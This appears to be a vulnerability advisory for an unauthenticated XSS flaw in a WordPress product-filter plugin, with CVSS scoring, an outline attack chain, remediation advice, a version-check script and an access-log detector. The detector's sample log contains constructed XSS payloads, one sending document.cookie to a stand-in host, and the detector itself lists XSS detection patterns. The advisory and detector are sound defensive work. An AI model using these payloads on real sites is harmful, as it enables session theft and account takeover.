
Product Filter Widget for Elementor CVE-2026-45437

EUVD-2026-36840 · HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-06-15 · Patchstack · GHSA-74gf-g3qr-4w7c
7.1 (CVSS 3.1) · Vendor: Patchstack

Severity by source

Vendor (Patchstack), primary rating: 7.1 HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

vuln.today AI: 7.1 HIGH
Network-delivered XSS: no authentication is needed (PR:N), but a victim must open a crafted request (UI:R). Scope is Changed because the injected script runs in the victim's browser, a different security authority from the vulnerable web server, with the Low confidentiality/integrity impact typical of XSS. Note that the vendor's 3.1 vector rates Availability Low while the 4.0 vector rates it None.
CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

CVSS Vector (Vendor: Patchstack)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: Low

Lifecycle Timeline

1. Analysis Generated: Jun 15, 2026, 21:54 (vuln.today)

Description (CVE.org)

Unauthenticated Cross Site Scripting (XSS) in Product Filter Widget for Elementor <= 1.0.6 versions.

Analysis (AI)

Cross-site scripting in the Product Filter Widget for Elementor WordPress plugin (versions <= 1.0.6) allows unauthenticated remote attackers to inject script that executes in a victim's browser. The CVE.org description does not say whether the injection is reflected or stored; the UI:R metric in the vector means a victim must act, typically by opening an attacker-supplied URL. The flaw was disclosed via Patchstack and carries a CVSS 3.1 score of 7.1, with Scope Changed because the script runs in the victim's browser rather than on the vulnerable server. No public exploit was identified at the time of analysis, and the CVE is not listed in CISA KEV.


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: identify a WordPress site running the vulnerable plugin
Weaponize: craft a URL with an XSS payload in a filter parameter
Deliver: send the link via phishing or social engineering
Exploit: the victim opens the link in a browser holding an active session; the payload executes in the site's origin
Act: exfiltrate data readable by the page or invoke the WordPress REST API with the victim's privileges
Impact: if the victim is an administrator, persist via a new admin user or a backdoored theme

Vulnerability Assessment (AI)

Exploitation: Exploitation requires the target WordPress site to have the Product Filter Widget for Elementor plugin installed at version 1.0.6 or earlier and active on a publicly reachable page, together with victim interaction (UI:R): typically clicking an attacker-supplied link to a crafted filter URL, or visiting an attacker-controlled page that issues the crafted request on the victim's behalf. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment: The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L scores 7.1 (High), driven primarily by the scope change (S:C) reflecting that XSS executes in a different security context (the victim's authenticated browser session) rather than by the raw impact severity. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario: An attacker crafts a URL targeting a vulnerable storefront's filter endpoint with a JavaScript payload embedded in a filter parameter, then distributes the link via phishing email, social media, or a comment on a forum frequented by site administrators. When a logged-in admin or shopper opens the link, the script executes in their browser under the site's origin, allowing the attacker to perform actions as the victim (e.g., create a backdoor user via the WordPress REST API when the victim is an administrator) or redirect them to a credential-harvesting page. Reading the session cookie directly is less practical than this paragraph suggests, since WordPress sets its own authentication cookies HttpOnly; the realistic route is driving authenticated requests from the victim's browser. …
Remediation: Upstream fix available per the Patchstack advisory; the patched release is not independently confirmed from the provided data, so administrators should upgrade Product Filter Widget for Elementor to the latest version above 1.0.6 as published on the WordPress.org plugin repository and consult the Patchstack advisory at https://patchstack.com/database/wordpress/plugin/product-filter-widget-for-elementor/vulnerability/wordpress-product-filter-widget-for-elementor-plugin-1-0-6-cross-site-scripting-xss-vulnerability for the exact fixed release. … Detailed patch versions, workarounds, and compensating controls in full report.
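Added example (not vuln.today's or the plugin's own code) for the triage step above: given `wp plugin list --format=json` output or the plugin's readme.txt, decide whether an installed copy falls in the affected range (<= 1.0.6). The plugin slug is taken from the Patchstack advisory URL; the sample JSON and readme text are constructed; the fixed release is not stated on this page, so the check only tests the affected boundary and does not name a safe version.

```python
"""Triage helper: is an installed copy of Product Filter Widget for Elementor
in the affected range (<= 1.0.6) of CVE-2026-45437?

Added example, not vuln.today's or the plugin's code. The sample inputs below
are constructed to look like a wp-cli `plugin list` JSON dump and a plugin
readme.txt; nothing here touches the network.
"""
import json
import re

PLUGIN_SLUG = "product-filter-widget-for-elementor"  # slug from the Patchstack advisory URL
LAST_AFFECTED = "1.0.6"                              # CVE.org: "<= 1.0.6 versions"


def parse_version(text: str) -> tuple:
    """'1.0.6' -> (1, 0, 6). A non-numeric suffix ('1.0.6-beta') is dropped,
    which errs toward flagging a build as affected rather than missing it."""
    core = re.match(r"\d+(?:\.\d+)*", text.strip())
    if core is None:
        raise ValueError(f"unparseable version: {text!r}")
    return tuple(int(p) for p in core.group(0).split("."))


def is_affected(version: str) -> bool:
    """True when version <= 1.0.6. Tuple comparison orders '1.0.10' after
    '1.0.6', which a plain string comparison would get wrong."""
    return parse_version(version) <= parse_version(LAST_AFFECTED)


def version_from_readme(readme_text: str):
    """Pull 'Stable tag: x.y.z' from a WordPress.org-style readme.txt, the file
    normally readable at /wp-content/plugins/<slug>/readme.txt."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme_text, re.IGNORECASE | re.MULTILINE)
    return m.group(1) if m else None


def affected_from_wp_cli(plugin_list_json: str) -> list:
    """Given `wp plugin list --format=json` output, return the affected entries.
    Inactive copies are still reported: the code is on disk and can be reactivated."""
    hits = []
    for plugin in json.loads(plugin_list_json):
        if plugin.get("name") == PLUGIN_SLUG and is_affected(plugin.get("version", "0")):
            hits.append(plugin)
    return hits


# Constructed sample data (hypothetical host, not a real inventory):
SAMPLE_WP_CLI = json.dumps([
    {"name": "elementor", "status": "active", "update": "none", "version": "3.20.0"},
    {"name": PLUGIN_SLUG, "status": "active", "update": "available", "version": "1.0.6"},
])
SAMPLE_README = (
    "=== Product Filter Widget for Elementor ===\n"
    "Requires at least: 5.0\n"
    "Stable tag: 1.0.5\n"
)

if __name__ == "__main__":
    for hit in affected_from_wp_cli(SAMPLE_WP_CLI):
        print(f"AFFECTED: {hit['name']} {hit['version']} ({hit['status']})")
    v = version_from_readme(SAMPLE_README)
    print(f"readme reports {v}: {'affected' if is_affected(v) else 'not affected'}")
```

Run `wp plugin list --format=json` on each host and feed the output to `affected_from_wp_cli`; readme.txt is a fallback when there is no shell access, but its Stable tag can lag the code actually installed, so treat the wp-cli or admin-panel version as authoritative.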

Recommended Action (AI)

Within 24 hours: Identify all WordPress sites running Product Filter Widget for Elementor versions ≤ 1.0.6; disable the plugin immediately as an interim mitigation; deploy Web Application Firewall rules blocking XSS payloads in filter parameters (a stopgap only: signature rules are bypassed by encoding variants, so upgrading remains the fix). …
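Added example (not vuln.today's code) to go with the detection and WAF step: a scanner over web-server access-log lines that flags requests carrying script-injection markers in query parameters, the delivery path the attack chain above describes. The plugin's real filter parameter names are not on this page, so every parameter is inspected; the `pf_*` names, hosts and payloads in the sample lines are constructed.

```python
"""Detection over access-log lines: flag requests whose query parameters carry
script-injection markers, the delivery path described for CVE-2026-45437.

Added example, not vuln.today's or the plugin's code. Parameter names, hosts
and payloads in SAMPLE_LOG are constructed, not captured from a real site.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristic markers, each a common way to get script execution from a reflected
# parameter. The handler pattern requires the '=' so values like 'onion' pass.
XSS_MARKERS = [
    ("script tag", re.compile(r"<\s*script", re.I)),
    ("event handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript: URL", re.compile(r"javascript\s*:", re.I)),
    ("injected element", re.compile(r"<\s*(svg|img|iframe|object|embed)\b", re.I)),
    ("cookie access", re.compile(r"document\s*\.\s*cookie", re.I)),
]


def decode_layers(value: str, rounds: int = 2) -> str:
    """Undo repeated percent-encoding (%2522 -> %22 -> "). A double-encoded
    payload slips past a rule that decodes only once, so peel extra layers."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_target(target: str) -> list:
    """Return (param, decoded_value, reason) for each suspicious query parameter.
    parse_qsl already removes one encoding layer and turns '+' into space."""
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = decode_layers(raw)
        for reason, pattern in XSS_MARKERS:
            if pattern.search(value):
                findings.append((name, value, reason))
                break
    return findings


def scan_log(lines) -> list:
    """Apply scan_target to every parsable line; return alert dicts for a SIEM."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value, reason in scan_target(m["target"]):
            alerts.append({
                "ip": m["ip"], "time": m["ts"], "path": urlsplit(m["target"]).path,
                "param": name, "value": value, "reason": reason, "status": int(m["status"]),
            })
    return alerts


# Constructed sample lines (hypothetical storefront; pf_* names are made up):
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jun/2026:21:10:01 +0000] "GET /shop/?pf_color=red&pf_size=m HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Jun/2026:21:11:43 +0000] "GET /shop/?pf_color=%3Cscript%3Efetch(%27https://example.net/%3F%27%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 5200 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Jun/2026:21:12:05 +0000] "GET /shop/?pf_size=%2522%2520onmouseover%253Dalert(1)%2520x%253D%2522 HTTP/1.1" 200 5180 "-" "Mozilla/5.0"',
    '192.0.2.33 - - [15/Jun/2026:21:13:30 +0000] "GET /shop/?pf_color=onion&pf_size=l HTTP/1.1" 200 5110 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['time']} {alert['ip']} {alert['path']} param={alert['param']!r} "
              f"reason={alert['reason']} value={alert['value'][:60]!r}")
```

The third sample line is double percent-encoded, which is why `decode_layers` peels two layers before matching; the fourth line shows the `onion` value passing because the handler pattern needs a trailing `=`. A 200 response on a flagged line says the request reached the site, not that the reflection succeeded; confirm against the patched plugin's behaviour before escalating.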




